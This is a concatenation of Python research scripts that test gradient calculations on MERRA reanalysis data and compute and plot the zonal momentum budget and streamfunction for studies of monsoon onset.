# Make a copy of each of the original files -- only run this code once!
# for filenm in probdata['filename']:
# shutil.copyfile(filenm, filenm.replace('.nc', '_orig.nc'))
for i, row in probdata.iterrows():
data = process_row(row, datadir, savedir)
# Plot data to check
def plot_data(probdata, savedir, i):
row = probdata.iloc[i]
filenm = row['filename']
filenm = savedir + os.path.split(filenm)[1]
jday = row['jday']
varnm = row['varnm']
with xray.open_dataset(filenm) as ds:
var = ds[varnm].load()
plt.figure(figsize=(16, 8))
plt.suptitle(os.path.split(filenm)[1])
plt.subplot(1, 3, 1)
atm.pcolor_latlon(var.sel(day=(jday-1)))
plt.title(jday - 1)
plt.subplot(1, 3, 2)
atm.pcolor_latlon(var.sel(day=jday))
plt.title(jday)
plt.subplot(1, 3, 3)
atm.pcolor_latlon(var.sel(day=(jday+1)))
plt.title(jday + 1)
```
|
{
"source": "jenfly/atmos",
"score": 2
}
|
#### File: atmos/testing/testing-data-gradient.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import xray
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
datadir = atm.homedir() + 'datastore/merra/daily/'
year = 2014
subset = '_40E-120E_90S-90N'
def get_var(datadir, varnm, subset, year):
filenm = '%smerra_%s%s_%d.nc' % (datadir, varnm, subset, year)
with xray.open_dataset(filenm) as ds:
var = ds[varnm].load()
return var
uq_int = get_var(datadir, 'UFLXQV', subset, year)
vq_int = get_var(datadir, 'VFLXQV', subset, year)
mfc = atm.moisture_flux_conv(uq_int, vq_int, already_int=True)
mfcbar = mfc.mean(dim='YDim').mean(dim='XDim')
# Test atm.gradient
a = atm.constants.radius_earth.values
latdim, londim = 1, 2
lat = atm.get_coord(uq_int, 'lat')
latrad = np.radians(lat)
latrad[abs(lat) > 89] = np.nan
coslat = xray.DataArray(np.cos(latrad), coords={'YDim' : lat})
lon = atm.get_coord(uq_int, 'lon')
lonrad = np.radians(lon)
mfc_x = atm.gradient(uq_int, lonrad, londim) / (a*coslat)
mfc_y = atm.gradient(vq_int * coslat, latrad, latdim) / (a*coslat)
mfc_test = mfc_x + mfc_y
mfc_test = - atm.precip_convert(mfc_test, 'kg/m2/s', 'mm/day')
mfc_test_bar = mfc_test.mean(dim='YDim').mean(dim='XDim')
diff = mfc_test - mfc
print(diff.max())
print(diff.min())
plt.plot(mfcbar)
plt.plot(mfc_test_bar)
print(mfc_test_bar - mfcbar)
# ----------------------------------------------------------------------
# Vertical gradient du/dp
lon1, lon2 = 40, 120
pmin, pmax = 100, 300
subset_dict = {'XDim' : (lon1, lon2), 'Height' : (pmin, pmax)}
urls = merra.merra_urls([year])
month, day = 7, 15
url = urls['%d%02d%02d' % (year, month, day)]
with xray.open_dataset(url) as ds:
u = atm.subset(ds['U'], subset_dict, copy=False)
u = u.mean(dim='TIME')
pres = u['Height']
pres = atm.pres_convert(pres, pres.attrs['units'], 'Pa')
dp = np.gradient(pres)
# Calc 1
dims = u.shape
dudp = np.nan * u
for i in range(dims[1]):
for j in range(dims[2]):
dudp.values[:, i, j] = np.gradient(u[:, i, j], dp)
# Test atm.gradient
dudp_test = atm.gradient(u, pres, axis=0)
diff = dudp_test - dudp
print(diff.max())
print(diff.min())
```
|
{
"source": "jenfly/monsoon-onset",
"score": 2
}
|
#### File: monsoon-onset/scripts/momentum-budget.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import numpy as np
import xarray as xray
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib as mpl
import collections
import atmos as atm
import merra
import indices
import utils
# ----------------------------------------------------------------------
yearstr = '1979-2014'
onset_nm = 'CHP_MFC'
ndays = 5
lon1, lon2 = 60, 100
daynm, yearnm = 'dayrel', 'year'
latname, lonname, pname = 'YDim', 'XDim', 'Height'
datadir = atm.homedir() + 'datastore/merra/analysis/'
savedir = 'figs/'
filenm = datadir + 'ubudget/merra_ubudget_dailyrel_%s_ndays%d_%dE-%dE_%s.nc'
files = {}
files['ubudget'] = filenm % (onset_nm, ndays, lon1, lon2, yearstr)
varnms = ['U', 'V']
plev_plot = 200
pmid = 500 # Pressure level to plot psi latitude-day contours
for nm in varnms:
filenm = datadir + 'merra_%s%d_dailyrel_%s_%s.nc'
files[nm] = filenm % (nm, plev_plot, onset_nm, yearstr)
filenm = datadir + 'merra_%s_sector_%dE-%dE_dailyrel_%s_%s.nc'
files[nm + '_latp'] = filenm % (nm, lon1, lon2, onset_nm, yearstr)
# ----------------------------------------------------------------------
# Read data from each year
# Zonal momentum budget components
filenm = files['ubudget']
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ubudget:
ubudget.load()
# Scaling factor for all terms in momentum budget
scale = 1e-4
ubudget = ubudget / scale
ubudget.attrs['comp_units'] = '%.0e m/s2' % scale
# Read other lat-lon variables and smooth with rolling mean
for nm in varnms:
filenm = files[nm]
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ds:
var = ds['%s%d' % (nm, plev_plot)].load()
daydim = atm.get_coord(var, coord_name=daynm, return_type='dim')
ubudget[nm] = atm.rolling_mean(var, ndays, axis=daydim, center=True)
# Read other lat-pres variables and smooth with rolling mean
data_latp = xray.Dataset()
for nm in varnms:
varnm = nm + '_latp'
filenm = files[varnm]
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ds:
var = ds[nm].load()
daydim = atm.get_coord(var, coord_name=daynm, return_type='dim')
data_latp[nm] = atm.rolling_mean(var, ndays, axis=daydim, center=True)
# Compute streamfunction
print('Computing streamfunction')
if (lon2 - lon1) < 360:
sector_scale = (lon2 - lon1) / 360.
else:
sector_scale = None
data_latp['PSI'] = atm.streamfunction(data_latp['V'], sector_scale=sector_scale)
# Additional metadata
ubudget.attrs['ndays'] = ndays
ubudget.attrs['lon1'] = lon1
ubudget.attrs['lon2'] = lon2
# Topography for lat-pres contour plots
print('Loading topography')
psfile = atm.homedir() + 'dynamics/python/atmos-tools/data/topo/ncep2_ps.nc'
with xray.open_dataset(psfile) as ds:
ps = ds['ps'] / 100
if (lon2 - lon1) < 360:
ps = atm.dim_mean(ps, 'lon', lon1, lon2)
else:
ps = atm.dim_mean(ps, 'lon')
# ----------------------------------------------------------------------
# Consolidate terms together
groups = collections.OrderedDict()
groups['ADV_AVG'] = ['ADV_AVG_AVG_X', 'ADV_AVG_AVG_Y', 'ADV_AVG_AVG_P']
groups['ADV_AVST'] = ['ADV_AVG_ST_X', 'ADV_AVG_ST_Y', 'ADV_AVG_ST_P']
groups['ADV_STAV'] = ['ADV_ST_AVG_X', 'ADV_ST_AVG_Y', 'ADV_ST_AVG_P']
groups['ADV_CRS'] = ['ADV_AVST', 'ADV_STAV']
groups['EMFC_TR'] = ['EMFC_TR_X', 'EMFC_TR_Y', 'EMFC_TR_P']
groups['EMFC_ST'] = ['EMFC_ST_X', 'EMFC_ST_Y', 'EMFC_ST_P']
groups['EMFC'] = ['EMFC_TR', 'EMFC_ST']
groups['COR'] = ['COR_AVG', 'COR_ST']
groups['ADV+COR'] = ['ADV_AVG', 'COR_AVG']
groups['SUM'] = ['ADV_AVG', 'ADV_CRS', 'EMFC', 'COR', 'PGF_ST', 'ANA']
print('Consolidating ubudget terms')
for key in groups:
nms = groups[key]
ubudget[key] = ubudget[nms[0]]
for nm in nms[1:]:
ubudget[key] = ubudget[key] + ubudget[nm]
# Tile the zonal mean values
varbig = ubudget['SUM']
for nm in ubudget.data_vars:
if lonname not in ubudget[nm].dims:
vals = atm.biggify(ubudget[nm], varbig, tile=True)
ubudget[nm] = xray.DataArray(vals, coords=varbig.coords)
# Sector mean budget
print('Computing sector mean ubudget')
ubudget_sector = atm.dim_mean(ubudget, 'lon', lon1, lon2)
# Streamfunction mean and eddy-driven decomposition
print('Computing streamfunction components')
eqbuf = 5.0
sector_scale = (lon2 - lon1) / 360.0
v = utils.v_components(ubudget_sector, scale=scale, eqbuf=eqbuf)
psi_comp = xray.Dataset()
for nm in v.data_vars:
psi_comp[nm] = atm.streamfunction(v[nm], sector_scale=sector_scale)
# Extract single pressure level for line plots
print('Extracting single pressure level for plots')
attrs = ubudget.attrs
attrs['plev'] = plev_plot
ubudget = atm.subset(ubudget, {pname: (plev_plot, plev_plot)}, squeeze=True)
ubudget_sector_plevs = ubudget_sector.copy()
ubudget_sector = atm.subset(ubudget_sector, {pname: (plev_plot, plev_plot)},
squeeze=True)
ubudget.attrs = attrs
ubudget_sector.attrs = attrs
print('Finished loading/calculating data')
# ----------------------------------------------------------------------
# Utility functions and plot formatting options
def saveclose(filestr):
atm.savefigs(filestr, ext='pdf', merge=True)
plt.close('all')
def get_daystr(plotdays):
if len(atm.makelist(plotdays)) > 1:
daystr = 'Rel Days %d to %d' % (plotdays[0], plotdays[-1])
savestr = 'reldays%d_%d' % (plotdays[0], plotdays[-1])
else:
daystr = 'Rel Day %d' % plotdays
savestr = 'relday%d' % plotdays
return daystr, savestr
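# e.g. get_daystr([-5, 5]) -> ('Rel Days -5 to 5', 'reldays-5_5') and, assuming
# atm.makelist wraps scalars in a list, get_daystr(0) -> ('Rel Day 0', 'relday0')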
# ----------------------------------------------------------------------
# Streamfunction latitude-day contours
psimid = atm.subset(data_latp['PSI'], {pname : (pmid, pmid)}, squeeze=True)
lat = atm.get_coord(data_latp, 'lat')
days = atm.get_coord(data_latp, 'dayrel')
clev = np.arange(-70, 71, 5)
ticks = np.arange(-70, 71, 10)
title='PSI%d' % pmid
plt.figure(figsize=(10, 7))
plt.contourf(days, lat, psimid.T, clev, cmap='RdBu_r', extend='both')
cb = plt.colorbar(ticks=ticks)
plt.ylim(-60, 60)
plt.xticks(np.arange(-120, 201, 30))
plt.grid()
plt.title(title)
plt.xlabel('Day Rel')
plt.ylabel('Latitude')
# ----------------------------------------------------------------------
# Streamfunction decomposition
def psi_latpres(psi, ps, cint=10, xlims=(-60, 60), xticks=range(-60, 61, 15),
title=''):
xmin, xmax = xlims
axlims = (xmin, xmax, 0, 1000)
atm.contour_latpres(psi, clev=cint, topo=ps, omitzero=True, axlims=axlims)
plt.xticks(xticks, xticks)
plt.grid()
plt.title(title, fontsize=10)
# plotdays = [-30, -15, 0, 15, 30]
# keys = ['TOT', 'MMC', 'EDDY', 'PGF', 'RESID']
plotdays = [-30, 0, 30]
keys = ['TOT', 'MMC', 'EDDY']
xlims, xticks = (-35, 35), range(-30, 31, 10)
cint = 5
nrow, ncol = len(keys), len(plotdays)
advance_by = 'col'
fig_kw = {'figsize' : (11, 7), 'sharex' : True, 'sharey' : True}
gridspec_kw = {'left' : 0.08, 'right' : 0.99, 'wspace' : 0.06, 'hspace' : 0.08,
'bottom' : 0.08, 'top' : 0.9}
# fig_kw = {'figsize' : (14, 8), 'sharex' : True, 'sharey' : True}
# gridspec_kw = {'left' : 0.06, 'right' : 0.99, 'wspace' : 0.06, 'hspace' : 0.08,
# 'bottom' : 0.06, 'top' : 0.92}
suptitle = '%d-%dE $\psi$ components' % (lon1, lon2)
grp = atm.FigGroup(nrow, ncol, advance_by, fig_kw=fig_kw,
gridspec_kw=gridspec_kw, suptitle=suptitle)
for key in keys:
for day in plotdays:
grp.next()
if grp.row == 0:
title = 'Day %d' % day
else:
title = ''
if key == 'TOT':
psi = data_latp['PSI'].sel(dayrel=day)
else:
psi = psi_comp[key].sel(dayrel=day)
psi_latpres(psi, ps, cint, xlims, xticks, title=title)
if grp.col > 0:
plt.ylabel('')
if grp.row < grp.nrow - 1:
plt.xlabel('')
atm.text(key, (0.05, 0.88))
# ----------------------------------------------------------------------
# Lat-pres contours of ubudget components
day = 0
nm = 'COR_AVG'
var = ubudget_sector_plevs[nm].sel(dayrel=day)
plt.figure()
atm.pcolor_latpres(var)
plt.xlim(-60,60)
# ----------------------------------------------------------------------
# Lat-pres contours and line plots on individual days
def latpres(data_latp, day, ps, xlims=(-60, 60), xticks=range(-60, 61, 15),
title=None, clev_u=5, clev_psi=5, u_clr='m', u_kw={'alpha' : 0.35},
psi_kw={'alpha' : 0.7}):
"""Plot lat-pres contours of streamfunction and zonal wind.
"""
xmin, xmax = xlims
axlims = (xmin, xmax, 0, 1000)
latp_data = atm.subset(data_latp, {'dayrel' : (day, day)}, squeeze=True)
u = latp_data['U']
psi = latp_data['PSI']
atm.contour_latpres(u, clev=clev_u, topo=ps, colors=u_clr,
contour_kw=u_kw, axlims=axlims)
atm.contour_latpres(psi, clev=clev_psi, omitzero=True, axlims=axlims,
contour_kw=psi_kw)
plt.xticks(xticks, xticks)
plt.grid()
if title is not None:
plt.title(title)
def lineplot(ubudget_sector, keys, day, style, xlims=(-60, 60),
xticks=range(-60, 61, 15), title=None, ylabel=None, legend=True,
legend_kw={'fontsize' : 8, 'loc' : 'lower center', 'ncol' : 2,
'handlelength' : 2.5}):
"""Plot ubudget terms and winds vs latitude."""
subset_dict = {'dayrel' : (day, day), 'lat': xlims}
data = atm.subset(ubudget_sector[keys], subset_dict, squeeze=True)
data = data.to_dataframe()
data.plot(ax=plt.gca(), style=style, legend=False)
plt.xlim(xlims)
plt.xticks(xticks, xticks)
plt.xlabel('Latitude')
plt.grid()
if legend:
plt.legend(**legend_kw)
if ylabel is not None:
plt.ylabel(ylabel)
if title is not None:
plt.title(title)
# Summary plot of psi and u lat-pres contours for presentation
nrow, ncol = 2, 2
advance_by = 'row'
fig_kw = {'figsize' : (11, 7), 'sharex' : 'col', 'sharey' : 'row'}
gridspec_kw = {'left' : 0.1, 'right' : 0.96, 'wspace' : 0.06, 'hspace' : 0.2,
'bottom' : 0.08, 'top' : 0.95}
plotdays = [-15, 0, 15, 30]
xlims, xticks = (-35, 35), range(-30, 31, 10)
grp = atm.FigGroup(nrow, ncol,fig_kw=fig_kw, gridspec_kw=gridspec_kw)
for day in plotdays:
grp.next()
title = 'Day %d' % day
latpres(data_latp, day, ps, xlims=xlims, xticks=xticks)
plt.title(title, fontsize=11)
if grp.row < grp.nrow - 1:
plt.xlabel('')
if grp.col > 0:
plt.ylabel('')
# Lat-pres contours and line plots of 200 mb momentum budget
style = {'ADV_AVG' : 'b', 'COR_AVG' : 'b--', 'ADV+COR' : 'r',
'PGF_ST' : 'k', 'ADV_CRS' : 'g', 'ADV_AVST' : 'g--',
'ADV_STAV' : 'g-.', 'EMFC' : 'm', 'EMFC_TR' : 'm--', 'EMFC_ST' : 'm-.',
'SUM' : 'k--', 'ACCEL' : 'c', 'ANA' : 'y', 'U' : 'k', 'V' : 'k--'}
keys_dict = collections.OrderedDict()
#keys_dict['ubudget'] = ['ADV_AVG', 'COR_AVG', 'ADV+COR', 'PGF_ST',
# 'ADV_CRS', 'EMFC', 'ANA', 'SUM', 'ACCEL']
keys_dict['ubudget'] = ['ADV_AVG', 'COR_AVG', 'ADV+COR', 'PGF_ST',
'ADV_CRS', 'EMFC']
keys_dict['winds'] = ['U', 'V']
keys_dict['eddies'] = ['EMFC_TR', 'EMFC_ST', 'EMFC', 'ADV_CRS']
ylabels = {}
units = '$10^{-4}$ m s$^{-2}$'
#ylabels['ubudget'] = '%d hPa ubudget (%s)' % (plev_plot, units)
ylabels['ubudget'] = units
ylabels['eddies'] = ylabels['ubudget']
#ylabels['winds'] = '%d hPa winds (m/s)' % plev_plot
ylabels['winds'] = 'm/s'
#plotdays = [-30, -15, 0, 15, 30] + [-90, -45, 0, 45, 90]
#nrow, ncol = 4, 5
plotdays = [-30, 0, 30]
nrow, ncol = 4, 3
advance_by = 'row'
# fig_kw = {'figsize' : (18, 12), 'sharex' : 'col', 'sharey' : 'row'}
# gridspec_kw = {'left' : 0.05, 'right' : 0.99, 'wspace' : 0.06, 'hspace' : 0.08,
# 'bottom' : 0.04, 'top' : 0.92, 'height_ratios' : [1, 0.6, 1, 1]}
fig_kw = {'figsize' : (11, 9), 'sharex' : 'col', 'sharey' : 'row'}
gridspec_kw = {'left' : 0.08, 'right' : 0.99, 'wspace' : 0.09, 'hspace' : 0.1,
'bottom' : 0.05, 'top' : 0.92, 'height_ratios' : [1, 0.6, 1, 1]}
legend_kw={'fontsize' : 8, 'loc' : 'upper center', 'ncol' : 2,
'handlelength' : 2.5}
suptitle = '%d-%d E U and $\psi$ contours, ubudget at 200 hPa' % (lon1, lon2)
#for tropics in [False, True]:
for tropics in [False]:
if tropics:
xlims, xticks = (-35, 35), range(-30, 31, 10)
else:
xlims, xticks = (-60, 60), range(-60, 61, 15)
grp = atm.FigGroup(nrow, ncol, advance_by, fig_kw=fig_kw,
gridspec_kw=gridspec_kw, suptitle=suptitle)
for day in plotdays:
grp.next()
if grp.row == 0:
title = 'Day %d' % day
else:
title = None
latpres(data_latp, day, ps, title=title, xlims=xlims, xticks=xticks)
for nm in ['winds', 'ubudget', 'eddies']:
grp.next()
if grp.col == 0:
legend = True
# if nm == 'ubudget' :
# legend_kw['loc'] = 'lower center'
# else:
# legend_kw['loc'] = 'upper center'
else:
legend = False
keys = keys_dict[nm]
lineplot(ubudget_sector, keys, day, style, xlims=xlims,
xticks=xticks, legend=legend, legend_kw=legend_kw,
ylabel=ylabels[nm])
saveclose(savedir + 'ubudget_sector_latpres_lineplots')
# ----------------------------------------------------------------------
# Plot groups together
keys_list = [['ADV_AVG', 'ADV_CRS', 'COR_AVG', 'COR_ST', 'EMFC', 'PGF_ST',
'SUM', 'ACCEL'],
['U', 'V'],
['ADV_AVG', 'ADV_AVST', 'ADV_STAV', 'ADV_CRS'],
['COR_AVG', 'COR_ST', 'COR'],
['EMFC_TR', 'EMFC_ST', 'EMFC']]
def pcolor_sector(var, daynm, clims, u=None, v=None):
days = var[daynm].values
lat = atm.get_coord(var, 'lat')
x, y = np.meshgrid(days, lat)
vals = var.values.T
vals = np.ma.masked_array(vals, mask=np.isnan(vals))
plt.pcolormesh(x, y, vals, cmap='RdBu_r')
plt.clim(clims)
plt.colorbar(extend='both')
if u is not None:
plt.contour(x, y, u.values.T, [0], colors='k', linewidths=1.5)
if v is not None:
plt.contour(x, y, v.values.T, [0], colors='k', alpha=0.5)
plt.xlim(days.min(), days.max())
plt.xlabel('Rel Day')
plt.ylabel('Latitude')
def plot_groups(ubudget, keys_list, daynm, plotdays=None, latlims=None):
"""Plot groups of lat-lon or lat-day plots.
"""
if latlims is not None:
ubudget = atm.subset(ubudget, {'lat' : latlims})
units = ubudget.attrs['comp_units']
plev = ubudget.attrs['plev']
lon1, lon2 = ubudget.attrs['lon1'], ubudget.attrs['lon2']
try:
lon = atm.get_coord(ubudget, 'lon')
sector = False
except ValueError:
sector = True
if sector:
suptitle = '%d-%d E Zonal Momentum Budget at %d hPa (%s)'
suptitle = suptitle % (lon1, lon2, plev, units)
xticks = range(-120, 201, 60)
else:
daystr, savestr = get_daystr(plotdays)
suptitle = '%s Zonal Momentum Budget at %d hPa (%s)'
suptitle = suptitle % (daystr, plev, units)
xticks = range(40, 121, 20)
nrow, ncol = 3, 4
figsize = (14, 10)
opts = {'left' : 0.05, 'right' : 0.95, 'bottom' : 0.04, 'top' : 0.92,
'wspace' : 0.1, 'hspace' : 0.1}
for i, keys in enumerate(keys_list):
if sector:
data = ubudget[keys]
else:
data = atm.subset(ubudget[keys], {daynm : (plotdays, None)})
if len(atm.makelist(plotdays)) > 1:
data = data.mean(dim=daynm)
clims = atm.climits(data, symmetric=True)
if sector:
clims = 0.9 * np.array(clims)
if i == 0 or i == 2:
isub = 0
plt.figure(figsize=figsize)
plt.suptitle(suptitle)
plt.subplots_adjust(**opts)
for j, nm in enumerate(keys):
isub += 1
if 'U' in keys:
clims = atm.climits(data[nm], symmetric=True)
plt.subplot(nrow, ncol, isub)
if sector:
pcolor_sector(data[nm], daynm, clims, ubudget['U'], ubudget['V'])
else:
atm.pcolor_latlon(data[nm], fancy=False)
plt.clim(clims)
plt.title(nm, fontsize=9)
atm.fmt_subplot(nrow, ncol, isub, xticks=xticks)
plt.grid(True)
# Skip to next row if necessary
if ncol > len(keys):
isub += ncol - len(keys)
for tropics in [True, False]:
savestr = savedir + 'ubudget_'
if tropics:
savestr = savestr + 'tropics_'
latlims = [-30, 30]
else:
latlims = None
# Lat-lon maps
for plotdays in [-90, -30, 0, 30, 60]:
plot_groups(ubudget, keys_list, daynm, plotdays, latlims)
saveclose(savestr + 'latlon')
# Sector lat-day maps
plot_groups(ubudget_sector, keys_list, daynm, None, latlims)
saveclose(savestr + 'sector_latday')
# ----------------------------------------------------------------------
# def zerocrossings(var, latmin, latmax, smoothing=30, interp_res=0.1, nkeep=3):
# var = atm.subset(var, {'lat' : (latmin, latmax)})
# if smoothing is not None:
# var = atm.rolling_mean(var, smoothing, axis=0, center=True)
# lat = atm.get_coord(var, 'lat')
# lat_i = np.arange(latmin, latmax + interp_res, interp_res)
# daynm = var.dims[0]
# days = var[daynm]
# crossings = np.nan * np.ones((nkeep, len(days)), dtype=float)
#
# for d, day in enumerate(days):
# vals = var.sel(**{daynm : day})
# if not np.isnan(vals).all():
# vals = np.interp(lat_i, lat, vals)
# icross = np.where(np.diff(np.sign(vals)))[0]
# latcross = lat_i[icross]
# n = min(nkeep, len(latcross))
# crossings[:n, d] = latcross[:n]
#
# coords = {'n' : np.arange(nkeep) + 1, daynm : var[daynm]}
# crossings = xray.DataArray(crossings, name='zerolat', dims=['n', daynm],
# coords=coords)
#
# return crossings
#
# def psimax_lat(psi, latmin=-30, latmax=10, pmin=300, pmax=700, nsmooth=5):
# days_in = psi['dayrel']
# psi = atm.subset(psi, {'lat' : (latmin, latmax), 'plev' : (pmin, pmax)},
# squeeze=True)
# psi = psi[nsmooth:-nsmooth]
# pdim = atm.get_coord(psi, 'plev', 'dim')
# psi = psi.max(axis=pdim)
#
# lat = atm.get_coord(psi, 'lat')
# latdim = atm.get_coord(psi, 'lat', 'dim')
# ilatmax = psi.argmax(axis=latdim)
# latmax = lat[ilatmax]
# days = atm.get_coord(psi, 'dayrel')
# latmax = xray.DataArray(latmax, coords={'dayrel' : days})
# latmax = latmax.reindex_like(days_in)
# return latmax
# ----------------------------------------------------------------------
# # Line plots on individual days
#
# latmin, latmax = -40, 50
# smoothing = None
# nkeep = {'U' : 2, 'V' : 3}
# zerolats = xray.Dataset()
# for nm in nkeep:
# n = nkeep[nm]
# crossings = zerocrossings(ubudget_sector[nm], latmin, latmax, nkeep=n,
# smoothing=smoothing)
# for i in crossings['n'].values:
# key = nm + '%d' % i
# zerolats[key] = crossings.sel(n=i).drop('n')
#
# check_zerolats = False
# if check_zerolats:
# plt.figure()
# for nm in zerolats.data_vars:
# plt.plot(zerolats[daynm], zerolats[nm], label=nm)
# plt.legend()
#
#
# style = {'ADV_AVG' : 'b', 'COR_AVG' : 'b--', 'ADV+COR' : 'r',
# 'PGF_ST' : 'k', 'ADV_CRS' : 'g', 'ADV_AVST' : 'g--',
# 'ADV_STAV' : 'g-.', 'EMFC' : 'm', 'EMFC_TR' : 'm--', 'EMFC_ST' : 'm-.',
# 'SUM' : 'k--', 'ACCEL' : 'c', 'ANA' : 'y', 'U' : 'k', 'V' : 'k--'}
#
# keys_dict = collections.OrderedDict()
# keys_dict['ubudget'] = ['ADV_AVG', 'COR_AVG', 'ADV+COR', 'PGF_ST',
# 'ADV_CRS', 'EMFC', 'ANA', 'SUM', 'ACCEL']
# keys_dict['winds'] = ['U', 'V']
# keys_dict['eddies'] = ['EMFC_TR', 'EMFC_ST', 'EMFC', 'ADV_AVST', 'ADV_STAV',
# 'ADV_CRS']
# suptitle = '%d-%d E %s at %d hPa'
# suptitles = {}
# suptitles['ubudget'] = suptitle % (lon1, lon2, 'Zonal Momentum Budget', plev)
# suptitles['eddies'] = suptitles['ubudget']
# suptitles['winds'] = suptitle % (lon1, lon2, 'Winds', plev)
# ylabels = {}
# ylabels['ubudget'] = 'ubudget (%s)' % ubudget.attrs['comp_units']
# ylabels['eddies'] = ylabels['ubudget']
# ylabels['winds'] = 'winds (m/s)'
#
# plotdays = [-90, -30, -15, 0, 15, 30, 60, 90]
# nrow, ncol = 2, 4
# figsize = (14, 10)
# lat = atm.get_coord(ubudget, 'lat')
# latname = atm.get_coord(ubudget, 'lat', 'name')
# opts = {'left' : 0.05, 'right' : 0.95, 'bottom' : 0.06, 'top' : 0.94,
# 'wspace' : 0.1, 'hspace' : 0.1}
# lg_row, lg_col, lg_loc, lg_ncol = 2, 1, 'upper center', 2
# zlat_opts = {'U1' : {'label' : 'U=0'}, 'U2' : {},
# 'V1' : {'linestyle' : 'dashed', 'label' : 'V=0'},
# 'V2' : {'linestyle' : 'dashed'}, 'V3' : {'linestyle' : 'dashed'}}
#
# for nm in keys_dict:
# keys = keys_dict[nm]
# suptitle, ylabel = suptitles[nm], ylabels[nm]
# for latlims in [(-60, 60), (-35, 35)]:
# fig, axes = plt.subplots(nrow, ncol, figsize=figsize, sharex=True,
# sharey=True)
# plt.subplots_adjust(**opts)
# plt.autoscale(tight=True)
# plt.suptitle(suptitle)
# for i, day in enumerate(plotdays):
# row, col = atm.subplot_index(nrow, ncol, i + 1)
# ax = axes[row - 1, col - 1]
# subset_dict = {daynm : (day, day), latname: latlims}
# data = atm.subset(ubudget_sector[keys], subset_dict, squeeze=True)
# #data = data.drop(daynm).to_dataframe()
# data = data.to_dataframe()
# data.plot(ax=ax, style=style, legend=False)
# # Plot vertical lines for U=0 and V=0
# zlats = zerolats.sel(**{daynm : day})
# for nm in zlats.data_vars:
# ax.axvline(zlats[nm], color='k', alpha=0.5, linewidth=1.5,
# **zlat_opts[nm])
# ax.set_title('Day %d' % day, fontsize=10)
# ax.grid(True)
# if row == lg_row and col == lg_col:
# ax.legend(fontsize=9, loc=lg_loc, ncol=lg_ncol, handlelength=3)
# if row == nrow:
# ax.set_xlabel('Lat')
# if col == 1:
# ax.set_ylabel(ylabel)
#
# saveclose(savedir + 'ubudget_sector_lineplots')
# ----------------------------------------------------------------------
# latmax = psimax_lat(data_latp['PSI'], nsmooth=ndays, pmin=600, pmax=700)
#
# # Ubudget terms at latitude of psimax
# print('Computing ubudget terms at latitude of psimax for each day')
# days = latmax['dayrel']
# days = days[np.isfinite(latmax)]
# ubudget_psimax = xray.Dataset()
# for d, day in enumerate(days):
# lat0 = latmax.sel(dayrel=day).values
# ds = atm.subset(ubudget_sector, {'lat' : (lat0, lat0)}, squeeze=True)
# ds = atm.subset(ds, {'dayrel' : (day, day)}, squeeze=False)
# if d == 0:
# ubudget_psimax = ds
# else:
# ubudget_psimax = xray.concat([ubudget_psimax, ds], dim='dayrel')
#
# keys = ['ADV_AVG', 'COR_AVG', 'ADV+COR_AVG', 'PGF_ST',
# 'ADV_CRS', 'EMFC', 'ANA', 'SUM', 'ACCEL']
#
# xticks = range(-120, 201, 30)
# xlims = [-120, 200]
# plt.figure(figsize=(8, 12))
# plt.subplot(2, 1, 1)
# plt.plot(latmax['dayrel'], latmax)
# plt.xticks(xticks)
# plt.xlim(xlims)
# plt.grid(True)
# plt.subplot(2, 1, 2)
# ubudget_psimax[keys].to_dataframe().plot(ax=plt.gca(), style=style, legend=False)
# plt.legend(fontsize=8, ncol=3)
# plt.xticks(xticks)
# plt.xlim(xlims)
# plt.grid(True)
```
#### File: monsoon-onset/scripts/save-dailyrel-momentum-budget.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
sys.path.append('/home/jwalker/dynamics/python/monsoon-onset')
import os
import numpy as np
import xarray as xray
import pandas as pd
import matplotlib.pyplot as plt
import collections
import atmos as atm
import merra
import indices
import utils
# ----------------------------------------------------------------------
version = 'merra2'
years = np.arange(1980, 2016)
onset_nm = 'CHP_MFC'
plevs = [1000,925,850,775,700,600,500,400,300,250,200,150,100,70,50,30,20]
ind_nm, npre, npost = 'onset', 140, 230
#ind_nm, npre, npost = 'retreat', 270, 100
datadir = atm.homedir() + 'datastore/%s/analysis/' % version
savedir = atm.homedir() + 'datastore/%s/analysis/' % version
filestr = datadir + version + '_ubudget%d_ndays5_60E-100E_%d.nc'
savestr = savedir + version + '_ubudget%d_dailyrel_'
if ind_nm == 'retreat':
savestr = savestr + 'retreat_'
savestr = savestr + onset_nm +'_ndays5_60E-100E'
datafiles, savefiles = {}, {}
for plev in plevs:
datafiles[plev] = [filestr % (plev, yr) for yr in years]
savefiles[plev] = [savestr % plev + '_%d.nc' % yr for yr in years]
yearstr = '%d-%d' % (min(years), max(years))
indfile = savedir + version + '_index_%s_%s.nc' % (onset_nm, yearstr)
# ----------------------------------------------------------------------
# Onset index for each year
print('Opening ' + indfile)
with xray.open_dataset(indfile) as index:
index.load()
onset = index['onset'].values
retreat = index['retreat'].values
# ----------------------------------------------------------------------
# Get daily data
def get_data(datafile, year, d0, npre, npost):
daymin, daymax = d0 - npre, d0 + npost
ndays = len(atm.season_days('ANN', year))
file_pre = datafile.replace(str(year), str(year - 1))
file_post = datafile.replace(str(year), str(year + 1))
    if daymin < 1 and os.path.isfile(file_pre):
print('---Loading prev year ' + file_pre)
with xray.open_dataset(file_pre) as ds_pre:
ds_pre.load()
else:
ds_pre = None
if daymax > ndays and os.path.isfile(file_post):
print('---Loading next year ' + file_post)
with xray.open_dataset(file_post) as ds_post:
ds_post.load()
else:
ds_post = None
print('Loading ' + datafile)
with xray.open_dataset(datafile) as ds:
data = utils.wrapyear(ds, ds_pre, ds_post, daymin, daymax, year=year)
data.attrs = ds.attrs
return data
for plev in plevs:
for y, year in enumerate(years):
datafile = datafiles[plev][y]
d_onset, d_retreat = onset[y], retreat[y]
d0 = int(index[ind_nm][y].values)
ds_rel = xray.Dataset()
ds = get_data(datafile, year, d0, npre, npost)
ds_rel.attrs = ds.attrs
for nm in ds.data_vars:
